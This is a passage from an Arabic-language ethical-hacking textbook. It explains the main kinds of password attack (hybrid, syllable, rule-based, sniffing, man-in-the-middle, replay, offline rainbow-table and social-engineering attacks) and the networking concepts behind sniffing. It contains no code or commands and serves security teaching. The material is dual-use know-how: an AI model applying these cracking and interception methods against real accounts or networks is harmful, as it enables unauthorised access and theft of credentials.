‫إذا ﺗم اﺧﺗﯾﺎر ﻣﻔﺎﺗﯾﺢ أﺻﻠﻰ ﺑطرﯾﻘﮫ ﻋﺷواﺋﯾﺔ أو اﻟﺑﺣث ﻋﻧﮫ ﺑﺷﻛل ﻋﺷواﺋﻲ‪ ،‬ﻓﺎن اﻟﻧص اﻟﻌﺎدي‪ ،‬ﻓﻲ اﻟﻣﺗوﺳط‪ ،‬ﺳوف ﯾﺻﺑﺢ ﻣﺗﺎح ﺑﻌد اﺳﺗﺧدام‬
‫ﻧﺻف ﺟﻣﯾﻊ ﻣﻔﺎﺗﯾﺢ اﻟﻣﻣﻛﻧﺔ‪.‬‬

‫ﺑﻌض اﻻﻋﺗﺑﺎرات اﻟﺗﻲ ﯾﺟب ان ﺗﻌرﻓﮭﺎ ﺣول ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ھﻲ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪ -‬اﻟﻌﻣﻠﯾﺔ ﺗﺳﺗﻐرق وﻗﺗﺎ طوﯾﻼ‪.‬‬
‫‪ -‬ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف ﯾﻣﻛن اﻟﻌﺛور ﻋﻠﻰ ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬اﻟﮭﺟﻣﺎت ﺿد ‪ NT hashes‬ھﻲ أﺻﻌب ﺑﻛﺛﯾر ﻣن ‪.LM hashes‬‬

‫اﻟﮭﺟوم اﻟﮭﺟﯾن ‪HYBRID ATTACK‬‬

‫ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻌﺗﻣد ﻋﻠﻰ ھﺟوم اﻟﻘﺎﻣوس )‪ .(Dictionary attack‬ھﻧﺎك اﺣﺗﻣﺎﻻت ﺑﺄن اﻟﻧﺎس ﻗد ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم‬
‫ﻓﻘط ﻋن طرﯾﻖ إﺿﺎﻓﺔ ﺑﻌض اﻷرﻗﺎم ﻟﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم اﻟﻘدﯾﻣﺔ‪ .‬ﻓﻲ ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم‪ ،‬ﯾﺿﯾف اﻟﺑرﻧﺎﻣﺞ ﺑﻌض اﻷرﻗﺎم واﻟرﻣوز‬
‫إﻟﻰ ﻛﻠﻣﺎت ﻣن ‪ Dictionary‬وﯾﺣﺎول ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎﻧت ﻛﻠﻣﺔ اﻟﻣرور اﻟﻘدﯾﻣﺔ ھﻲ "‪ ،"system‬ﻓﺎن ھﻧﺎك ﻓرﺻﺔ‬
‫أن اﻟﺷﺧص ﯾﻐﯾره إﻟﻰ "‪ "system1‬أو "‪."system2‬‬

‫‪SYLLABLE ATTACK‬‬

‫‪ Syllable attack‬ھو ﻣزﯾﺞ ﻣن ﻛل ﻣن ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪ (brute force attack‬وھﺟوم اﻟﻘﺎﻣوس)‪. (dictionary attack‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب ﻋﻧدﻣﺎ ﺗﻛون ﻛﻠﻣﺔ اﻟﻣرور ﻛﻠﻣﮫ ﻟﯾﺳت ﻣوﺟودة‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا ‪ dictionary‬وﻏﯾرھﺎ ﻣن اﻟطرق ﻟﻠﻘﺿﺎء ﻋﻠﯾﮫ‪.‬‬
‫ﯾﺳﺗﺧدم أﯾﺿﺎ ﻓﻲ اﻟﺗرﻛﯾﺑﺎت اﻟﻣﻣﻛﻧﺔ ﻟﻛل اﻟﻛﻠﻣﺎت اﻟﻣوﺟودة ﻓﻲ ‪.dictionary‬‬

‫ھﺟوم ﻣﺳﺗﻧد إﻟﻰ ﻗواﻋد ‪RULE-BASED ATTACK‬‬


‫ﯾﺳﺗﺧدم ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻋﻧدﻣﺎ ﯾﺣﺻل اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﺑﻌض اﻟﻣﻌﻠوﻣﺎت ﺣول ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ھذا ھو اﻟﮭﺟوم اﻷﻗوى ﻷن اﻟﻣﮭﺎﺟم ﯾﻌرف‬
‫ﻧوع ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﯾﻌرف أن ﻛﻠﻣﺔ ﺗﺣﺗوي ﻋﻠﻰ ﻋدد أرﻗﺎم ﺛﻼﺛﺔ أو اﺛﻧﯾن‪ ،‬ﻓﺎﻧﮫ ﺳوف ﯾﺳﺗﺧدم ﺑﻌض‬
‫اﻟﺗﻘﻧﯾﺎت اﻟﻣﺣددة ﻻﺳﺗﺧراج اﻟﻛﻠﻣﺔ ﻓﻲ وﻗت أﻗل‪.‬‬
‫ﻣن ﺧﻼل اﻟﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﻣﻔﯾدة ﻣﺛل اﺳﺗﺧدام اﻷرﻗﺎم‪ ،‬طول ﻛﻠﻣﺔ اﻟﺳر‪ ،‬اﻟرﻣوز اﻟﺧﺎﺻﺔ‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺑﺳﮭوﻟﺔ ﺿﺑط اﻟوﻗت‬
‫ﻻﺳﺗرﺟﺎع ﻛﻠﻣﺔ اﻟﻣرور إﻟﻰ اﻟﺣد اﻷدﻧﻰ وﺗﺣﺳﯾن أداة اﻟﻛﺳر ﻻﺳﺗرداد ﻛﻠﻣﺎت اﻟﺳر‪ .‬ھذا اﻷﺳﻠوب ﯾﺷﻣل ھﺟﻣﺎت ‪،brute force‬‬
‫‪ ،dictionary‬و‪.syllable‬‬

‫‪TYPES OF PASSWORD ATTACKS‬‬

‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور )‪ (Password Cracking‬ھﻲ واﺣدة ﻣن اﻟﻣراﺣل اﻟﺣﺎﺳﻣﺔ ﻣن ﻗرﺻﻧﺔ اﻟﻧظﺎم‪ .‬ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﺗﺳﺗﺧدم ﻷﻏراض‬
‫ﻗﺎﻧوﻧﯾﺔ ﻓﻲ اﺳﺗرداد ﻛﻠﻣﺔ اﻟﺳر اﻟﻣﻔﻘودة ﻟﻠﻣﺳﺗﺧدم؛ إذا ﺗم اﺳﺗﺧداﻣﮫ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدﻣﯾن ﺑطرﯾﻘﮫ ﻏﯾر ﺷرﻋﯾﺔ‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن أن ﯾﺳﺑب ﻟﮭم‬
‫ﻟﻠﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎز ﻏﯾر ﻣﺻرح ﺑﮭﺎ ﻋﻠﻰ اﻟﺷﺑﻛﺔ أو اﻟﻧظﺎم‪ .‬ﺗﺻﻧف ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﺑﻧﺎء ﻋﻠﻰ إﺟراءات اﻟﻣﮭﺎﺟم ﻓﻲ ﻛﺳر ﻛﻠﻣﺔ‬
‫اﻟﻣرور‪ .‬ﻋﺎدة ﻣﺎ ﺗﻛون ھﻧﺎك أرﺑﻌﺔ أﻧواع وھم‪:‬‬

‫‪Passive Online Attacks -1‬‬


‫ھو ھﺟوم ﻋﻠﻰ ﻧظﺎم ﻻ ﯾؤدي إﻟﻰ ﺗﻐﯾﯾر اﻟﻧظﺎم ﺑﺄي ﺷﻛل ﻣن اﻷﺷﻛﺎل‪ .‬اﻟﮭﺟوم ھو ﻋﺑﺎره ﻋن ﻋﻣﻠﯾﺔ ﻟرﺻد أو ﺗﺳﺟﯾل اﻟﺑﯾﺎﻧﺎت‪Passive .‬‬
‫‪ attack‬ﻋﻠﻰ ﺗﺷﻔﯾر ھﻲ واﺣدة ﯾﻛون ﻓﯾﮭﺎ ﺗﺣﻠﯾل اﻟﺷﻔر ﻻ ﯾﻣﻛن أن ﯾﺗﻔﺎﻋل ﻣﻊ أي ﻣن اﻷطراف اﻟﻣﻌﻧﯾﺔ‪ ،‬ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﻛﺳر اﻟﻧظﺎم ﯾﻌﺗﻣد ﻓﻘط‬
‫ﻋﻠﻰ اﻟﺑﯾﺎﻧﺎت اﻟﻣرﺻودة‪ .‬ھﻧﺎك ﺛﻼث أﻧواع ﻣن اﻟﮭﺟﻣﺎت اﻟﺳﻠﺑﯾﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت‪ .‬وھم‪:‬‬
‫‪Wire sniffing -‬‬
‫‪Man-in-the-middle -‬‬
‫‪Replay -‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪324‬‬

‫‪Active online attack -2‬‬


‫اﻟﮭﺟوم ﻋﻠﻰ اﻻﻧﺗرﻧت اﻟﻧﺷط )‪ (Active online attack‬ھو أﺳﮭل طرﯾﻘﺔ ﻟﻛﺳب اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ ﻋﻠﻰ ﻣﺳﺗوى اﻟﻣﺳؤول إﻟﻰ‬
‫اﻟﻧظﺎم‪ .‬ھﻧﺎك ﺛﻼﺛﺔ أﻧواع ﻣن اﻟﮭﺟﻣﺎت اﻟﻧﺷطﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت‪ .‬وھم‪:‬‬
‫‪Password guessing -‬‬
‫‪Trojan/spyware/key logger -‬‬
‫‪Hash injection -‬‬
‫‪Phishing -‬‬
‫‪Offline Attacks -3‬‬
‫ﺗﺣدث ھﺟﻣﺎت ‪ Offline attacks‬ﻋﻧدﻣﺎ ﯾﺗﺣﻘﻖ اﻟدﺧﯾل ﻣن ﺻﺣﺔ ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ﺣﯾث اﻧﮫ ﯾﻼﺣظ ﻛﯾﻔﯾﺔ ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ اﻟﻧظﺎم‬
‫اﻟﻣﺳﺗﮭدف‪ .‬إذا ﺗم ﺗﺧزﯾن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻠف ﻗﺎﺑل ﻟﻠﻘراءة‪ ،‬ﯾﺻﺑﺢ ﻣن اﻟﺳﮭل ﻋﻠﻰ اﻟدﺧﯾل اﻟوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬ﻣن‬
‫أﺟل ﺣﻣﺎﯾﺔ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﯾﻧﺑﻐﻲ داﺋﻣﺎ أن ﺗﺑﻘﻰ ﻓﻲ ﺷﻛل ﻏﯾر ﻗﺎﺑل ﻟﻠﻘراءة‪ ،‬وھو ﻣﺎ ﯾﻌﻧﻲ أﻧﮭﺎ ﯾﺟب أن ﺗﻛون ﻣﺷﻔرة‪ .‬ھﺟﻣﺎت‬
‫‪ Offline attacks‬ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻛون ﻣﺿﯾﻌﺔ ﻟﻠوﻗت‪ .‬ﻛﺎﻧت ﻣن ﻗﺑل ﻧﺎﺟﺣﺔ ﺑﺳب ﺿﻌف ‪ LM hash‬وذﻟك ﻻن ﺣﺟﻣﮫ ‪ keyspace‬ﻛﺎن أﺻﻐر‬
‫ﺣﺟﻣﺎ وأﻗﺻر طوﻻ‪ .‬وﺗﺗوﻓر ﺗﻘﻧﯾﺎت ﻣﺧﺗﻠﻔﺔ ﻟﻛﺳﯾر ﻛﻠﻣﺔ ﻣرور ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت‪ .‬ﺗﻘﻧﯾﺎت ﻟﻣﻧﻊ أو اﻟﺣﻣﺎﯾﺔ ﻣن ھﺟﻣﺎت ‪Offline attacks‬‬
‫ھﻲ‪:‬‬
‫‪Use good passwords -‬‬
‫‪Remove LM hashes -‬‬
‫‪Attacker has the password database -‬‬
‫‪Use cryptographically secure methods while representing the passwords -‬‬
‫ھﻧﺎك ﺛﻼﺛﺔ أﻧواع ﻣن ھﺟﻣﺎت ‪ .Offline attacks‬وھم‪:‬‬
‫‪Pre-computed hashes -‬‬
‫‪Distributed network -‬‬
‫‪Rainbow -‬‬
‫‪Non-electronic Attacks -4‬‬
‫‪ Non-electronic attacks‬اﻟﮭﺟﻣﺎت اﻟﻐﯾر إﻟﻛﺗروﻧﯾﺔ ﺗﻌرف أﯾﺿﺎ ﺑﺎﺳم ھﺟﻣﺎت ﻏﯾر اﻟﺗﻘﻧﯾﺔ)‪ . (non-technical attacks‬ھذا اﻟﻧوع‬
‫ﻣن اﻟﮭﺟﻣﺎت ﻻ ﯾﺗطﻠب أي ﻣﻌرﻓﺔ ﺗﻘﻧﯾﺔ ﺣول طرق اﻟﺗدﺧل ﻓﻲ ﻧظﺎم آﺧر‪ .‬ﻟذا‪ ،‬ﯾطﻠﻖ ﻋﻠﯾﮫ ھﺟوم ﻏﯾر إﻟﻛﺗروﻧﯾﺔ‪ .‬ھﻧﺎك ﺛﻼﺛﺔ أﻧواع ﻣن‬
‫اﻟﮭﺟﻣﺎت ﻏﯾر اﻹﻟﻛﺗروﻧﯾﺔ‪ .‬وھم‪:‬‬
‫‪Shoulder surfing -‬‬
‫‪Social engineering -‬‬
‫‪Dumpster diving -‬‬

‫‪Passive Online Attack: Wire Sniffing‬‬


‫ﻧﺎدرا ﻣﺎ ﯾﺗم اﺳﺗﺧدام أدوات اﻟﺗﺟﺳس )‪ (packet sniffer tool‬ﻓﻲ اﻟﮭﺟوم‪ .‬وذﻟك ﻷن ‪ sniffer‬ﯾﻣﻛن أن ﯾﻌﻣل ﻓﻘط ﻓﻲ ﻧطﺎق اﻟﺗﺻﺎدم‬
‫)‪ (collision domain‬اﻟﻣﺷﺗرﻛﺔ‪ .‬ﻻ ﯾﺗم رﺑط ﻣﺟﺎﻻت اﻟﺗﺻﺎدم )‪ (collision domain‬اﻟﻣﺷﺗرﻛﺔ ﻣن ﻗﺑل ‪ switch‬أو ‪ .bridge‬أﯾﺿﺎ‬
‫ﺟﻣﯾﻊ اﻟﻣﺿﯾﻔﯾن ﻋﻠﻰ ﺗﻠك اﻟﺷﺑﻛﺔ ﻻ ﯾﺗم ﺗﺣوﯾﻠﮭم )‪ (switched‬أو ‪ bridged‬ﻓﻲ ﻗطﺎع اﻟﺷﺑﻛﺔ‪.‬‬

‫‪:Collision domain‬‬
‫ﻧطﺎق اﻟﺗﺻﺎدم ھﻲ اﻟﺗﺻﺎدﻣﺎت اﻟﺗﻲ ﺗﺣدث ﺑﯾن ﺣزم اﻟﺑﯾﺎﻧﺎت ﻓﻲ اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ ﻣن ﻧوع إﯾﺛرﻧت‪ .‬ﯾﺣدث اﻟﺗﺻﺎدم ﻋﻧد ﻗﯾﺎم أﻛﺛر ﻣن ﺟﮭﺎز‬
‫ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﺑﺈرﺳﺎل ﺣزم ﺑﯾﺎﻧﺎت ﻓﻲ ﻧﻔس اﻟوﻗت ﻣﻣﺎ ﯾﻧﺗﺞ ﻋﻧﮫ ﻓﻘدان ﺗﻠك اﻟﺣزم او ﺣدوث اﺧﺗﻧﺎق ﻓﻲ اﻟﺷﺑﻛﺔ‪.‬‬
‫ﯾﻧﺗﺞ اﻻﺧﺗﻧﺎق ﺟراء اﺳﺗﺧدام ھﺎب )‪ (HUB‬او اﻟ ُﻣﻛرر ﻓﻲ ﺑﻧﯾﺔ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ‪ .lan‬وﯾﻣﻛن ﺣل اﻟﻣﺷﻛﻠﺔ ﺑﺎﺳﺗﺧدام اﻟﻣوزع)‪،(switched‬‬
‫اﻟﺟﺳر)‪ (bridged‬واﻟﻣوﺟﮫ )‪(router‬ﺣﯾث اﻧﮭﺎ ﺗﻘوم ﺑﺗﻘﺳﯾم ﻣﺟﺎل اﻟﺗﺻﺎدم ﻣﻣﺎ ﯾﻘﻠل ﻣن ﺣدوﺛﮫ ﻣﻊ ﻣﻼﺣظﺔ ان اﻟﻣوﺟﮫ )‪(router‬ﯾﻘوم‬
‫ﺑﺗﻘﺳﯾم ﻣﺟﺎل اﻟﺑث )‪ (broadcast domain‬اﯾﺿﺎ‪ .‬ﯾﻣﻛن ﺣل ﻣﺷﺎﻛل اﻻﺧﺗﻧﺎق ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ ﺗﺣﺳس اﻟﻧﺎﻗل ﻣﺗﻌدد اﻟوﺻول ﻣﻊ‬
‫ﺗﺣﺳس اﻟﺗﺻﺎدم‪(Carrier Sense Multiple Access With Collision detection CSMA/CD).‬‬
‫ﺗﺣﺳس اﻟﻧﺎﻗل ﻣﺗﻌدد اﻟوﺻول ﻣﻊ ﺗﺣﺳس اﻟﺗﺻﺎدم ﻗﺑل ﻗﯾﺎم اي ﺟﮭﺎز ﺑﺎرﺳﺎل اﻟﺑﯾﺎﻧﺎت‪ ،‬ﯾﺟب ان ﯾﻘوم ﺑﺗﺣﺳس اﻟﻧﺎﻗل واﻟﺗﺄﻛد ﻣن ﻋدم وﺟود‬
‫ﺑﯾﺎﻧﺎت ﻋﻠﻰ ذﻟك اﻟﻧﺎﻗل‪ ،‬ﻋﻧدھﺎ ﯾﻘوم ﺑﺈرﺳﺎل اﻟﺑﯾﺎﻧﺎت اﻟﻰ وﺟﮭﺗﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪325‬‬

‫‪:Broadcast domain‬‬
‫ﻣﺟﺎل اﻟﺑث وھﻲ ﻣﺟﻣوﻋﺔ ﻣن اﻻﺟﮭزة اﻟﻣرﺑوطﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ‪ ،Lan‬ﺑﺣﯾث ﯾﻣﻛن ﻷي ﻋﻘدة اﻟﺑث ﻟﻠﻣﺟﻣوﻋﺔ ﻋن طرﯾﻖ طﺑﻘﺔ رﺑط‬
‫اﻟﺑﯾﺎﻧﺎت ﻣن ﻣرﺟﻊ أو إس آي‪ .‬ﯾﻣﻛن ﻟﻧظﺎم اﻟﺑث ان ﯾﻛون ﻋﻠﻰ ﻧﻔس ﻣﻘطﻊ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ‪ Lan‬او ان ﯾوﺻل ﻟﻣﻘﺎطﻊ اﺧرى ﻣن اﻟﺷﺑﻛﺔ‬
‫ﺑﺎﺳﺗﺧدام ادوات رﺑط اﻟﺷﺑﻛﺔ‪.‬‬
‫ﻣﻌﻠوﻣﺔ ھﺎﻣﺔ ﺟدا ﺟدا ﺟدا‬
‫اﻟراوﺗر‪ :‬ﻛل اﻧﺗر ﻓﯾس ﻣن اﻟراوﺗر ﯾﻌﺗﺑر ‪ broadcast‬وﻓﻲ ﻧﻔس اﻟوﻗت ﻛل اﻧﺗر ﻓﯾس ﯾﻌﺗﺑر‪Collision domain‬‬
‫اﻟﺳوﯾﺗش‪ :‬ﻛﻠﮫ ﻋﻠﻰ ﺑﻌﺿﮫ ﯾﻌﺗﺑر ‪ broadcast‬وﻛل اﻧﺗر ﻓﯾس ﯾﻌﺗﺑر‪. Collision domain‬‬
‫‪ :Hub‬ﻛﻠﮫ ﻋﻠﻰ ﺑﻌﺿﮫ ﯾﻌﺗﺑر ‪.Collision domain‬‬

‫ﻛﻣﺎ ﯾﻘوم ‪ packet sniffer tool‬ﺑﺟﻣﻊ اﻟﺣزم ﻓﻲ طﺑﻘﺔ رﺑط اﻟﺑﯾﺎﻧﺎت‪ ، Data Link Layer‬ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ اﻻﺳﺗﯾﻼء ﻋﻠﻰ ﻛﺎﻓﺔ اﻟﺣزم‬
‫ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ )‪ (LAN‬ﻣن اﻟﺟﮭﺎز اﻟذي ﯾﻘوم ﺑﺗﺷﻐﯾل ﺑرﻧﺎﻣﺞ ‪ .Sniffer‬ھذا اﻷﺳﻠوب ﻣن اﻟﺻﻌب ﻧﺳﺑﯾﺎ ﺗﻧﻔﯾذه وﻣﻌﻘد ﺣﺳﺎﺑﯾﺎ‪ .‬وذﻟك‬
‫ﻷن اﻟﺷﺑﻛﺔ ﻣﻊ ‪ HUB‬ﺗﻧﻔذ ‪ broadcast medium‬اﻟﺗﻲ ﯾﺷﺗرك ﻓﯾﮭﺎ ﺟﻣﯾﻊ اﻷﻧظﻣﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ‪ .‬ﺣﯾث أي ﺑﯾﺎﻧﺎت ﯾﺗم إرﺳﺎﻟﮭﺎ ﻋﺑر‬
‫اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ اﻟﻰ ﺟﮭﺎز ﻣﻌﯾن ﻓﮭﯾﺎ ﻓﻲ اﻟواﻗﻊ ﯾﺗم ارﺳﺎﻟﮭﺎ إﻟﻰ ﻛل اﻷﺟﮭزة اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﺷﺑﻛﺔ اﻟداﺧﻠﯾﺔ ‪ .LAN‬ﻓﺈذا ﻗﺎم اﻟﻣﮭﺎﺟم ﺑﺗﺷﻐﯾل‬
‫‪ Sniffers‬ﻋﻠﻰ أي ﻧظﺎم ﻣوﺟود ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟداﺧﻠﯾﺔ )‪(LAN‬ﻓﺎﻧﮫ ﯾﻣﻛن ﺟﻣﻊ أي ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﻣرﺳﻠﺔ ﻣن وإﻟﻰ أي ﻧظﺎم آﺧر ﻋﻠﻰ اﻟﺷﺑﻛﺔ‬
‫اﻟﻣﺣﻠﯾﺔ‪ .‬ﻏﺎﻟﺑﯾﺔ أدوات اﻟﺗﺟﺳس )‪ (Sniffers‬ھﻲ ﻣﻧﺎﺳﺑﺔ ﻟﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت ﻓﻲ ﺑﯾﺋﺔ ‪ .hub‬وﺗﺳﻣﻰ ھذه اﻷدوات ‪ passive sniffers‬ﻷﻧﮭﺎ‬
‫ﺗﻧﺗظر ﺳﻠﺑﯾﺎ )أي ﻻ ﺗﺗﻔﺎﻋل ﻣﻊ أي ﻣن اﻷﺟﮭزة ﻋﻠﻰ اﻟﺷﺑﻛﺔ( اﻟﺑﯾﺎﻧﺎت ﻹرﺳﺎﻟﮭﺎ‪ ،‬ﻗﺑل اﻟﺗﻘﺎط اﻟﻣﻌﻠوﻣﺎت‪ .‬ﻓﮭﻲ ﻓﻌﺎﻟﺔ ﻓﻲ ﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت ﺑﺻورة‬
‫ﺗدرﯾﺟﯾﺔ ﻣن ‪ .LAN‬وﯾﻣﻛن أن ﺗﺷﻣل اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﺗم اﻟﺗﻘﺎطﮭﺎ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣرﺳﻠﺔ إﻟﻰ اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة ﺧﻼل ‪ Telnet‬و‪ ،FTP‬وﺟﻠﺳﺎت‬
‫ﻏﯾر أﻣﻧﮫ‪ ،‬واﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣرﺳﻠﺔ واﻟﻣﺳﺗﻠﻣﺔ‪ .‬ﯾﺗم اﺳﺗﺧدام اﻟﺑﯾﺎﻧﺎت ﻟﻠوﺻول ﻏﯾر اﻟﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻧظﺎم اﻟﮭدف‪ .‬وھﻧﺎك ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ‬
‫ﻣن اﻷدوات اﻟﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت ل ‪.passive wire sniffing‬‬

‫‪Passive Online Attack: Man-in-the-Middle and Replay Attack‬‬


‫ﻋﻧدﻣﺎ ﯾﺗم اﻟﺗواﺻل ﺑﯾن طرﻓﯾن‪ ،‬ﻓﺎن ھﺟوم رﺟل ﻓﻲ اﻟوﺳط )‪ (man-in-middle‬ﻣن اﻟﻣﻣﻛن ان ﯾﺄﺧذ ﻣﻛﺎﻧﺎ‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﻓﺎن ﯾوﺟد‬
‫طرف ﺛﺎﻟث ﯾﻌﺗرض اﻻﺗﺻﺎﻻت ﺑﯾن اﻟطرﻓﯾن‪ ،‬وﯾﺗﺄﻛد ﻣن ان اﻟﺗواﺻل ﺑﯾن اﻟطرﻓﯾن ﯾﺗم ﻣﻊ ﺑﻌﺿﮭم اﻟﺑﻌض‪ .‬ﻓﻲ اﻟوﻗت ﻧﻔﺳﮫ‪ ،‬ﻓﺎن اﻟطرف‬
‫اﻟﺛﺎﻟث ﯾﻣﻛﻧﮫ ﺗﻐﯾر اﻟﺑﯾﺎﻧﺎت أو اﻟﺗﻧﺻت وﯾﻣرر اﻟﺑﯾﺎﻧﺎت ﻋﻠﻰ طول اﻻﺗﺻﺎل‪.‬‬
‫ﻟﻠﻘﯾﺎم ﺑﮭذا‪ ،‬ﻓﺎﻧﮫ ﯾﺟب ﻋﻠﻰ اﻟرﺟل ﻓﻲ اﻟﻣﻧﺗﺻف )‪ (man-in-middle‬اﻟﺗﻧﺻت )‪(sniff‬ﻋﻠﻰ ﻛﻼ اﻟﺟﺎﻧﺑﯾن ﻣن اﻻﺗﺻﺎل ﻓﻲ ﻧﻔس اﻟوﻗت‪.‬‬
‫ﻛﺛﯾرا ﻣﺎ وﺟدت ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻓﻲ ‪ telnet‬واﻟﺗﻘﻧﯾﺎت اﻟﻼﺳﻠﻛﯾﺔ‪ .‬ﻓﺈﻧﮫ ﻟﯾس ﻣن اﻟﺳﮭل ﺗﻧﻔﯾذ ﻣﺛل ھذه اﻟﮭﺟﻣﺎت ﻧظرا ﻷرﻗﺎم ﺗﺳﻠﺳل‬
‫‪TCP‬واﻟﺳرﻋﺔ‪ .‬ھذا اﻷﺳﻠوب ﻣن اﻟﺻﻌب ﻧﺳﺑﯾﺎ ارﺗﻛﺎﺑﮫ وﯾﻣﻛن ان ﯾﻛﺳر ﻓﻲ ﺑﻌض اﻷﺣﯾﺎن ﺑﺈﺑطﺎل ﺣرﻛﺔ اﻟﻣرور‪.‬‬

‫ﻓﻲ ھﺟوم اﻹﻋﺎدة ‪ ،replay attack‬ﯾﺗم اﻟﺗﻘﺎط اﻟﺣزم ﺑﺎﺳﺗﺧدام ادوات اﻟﺗﻧﺻت )‪ .(sniffer tool‬ﺑﻌدھﺎ ﯾﺗم اﺳﺗﺧراج اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ‬
‫ﻣن اﻟﺣزﻣﮫ‪ ،‬ﺛم ﯾﺗم وﺿﻊ اﻟﺣزﻣﮫ ﻣرة أﺧرى ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ .‬ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻣﻛن أن ﯾﺳﺗﺧدم ﻹﻋﺎدة اﻟﻣﻌﺎﻣﻼت اﻟﻣﺻرﻓﯾﺔ ‪replay‬‬
‫‪bank transactions‬أو أﻧواع أﺧرى ﻣﻣﺎﺛﻠﺔ ﻣن ﻧﻘل اﻟﺑﯾﺎﻧﺎت أﻣﻼ ﻓﻲ ﺗﻛرار أو ﺗﻐﯾﯾر اﻷﻧﺷطﺔ‪ ،‬ﻣﺛل اﻟوداﺋﻊ أو اﻟﺗﺣوﯾﻼت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪326‬‬

‫‪Active Online Attack: Password Guessing‬‬


‫اﻟﺟﻣﯾﻊ ﯾﻌرف اﺳم اﻟﻣﺳﺗﺧدم اﻟﺧﺎص ﺑك‪ ،‬وﻟﻛن ﻛﻠﻣﺔ اﻟﻣرور ھو ﺳر ﯾﺟب اﻻﺣﺗﻔﺎظ ﺑﮫ ﺟﯾدا ﻣن اﺟل اﻟﺣﻔﺎظ ﻋﻠﻰ اﻵﺧرﯾن ﺑﻌﯾدا ﻋن‬
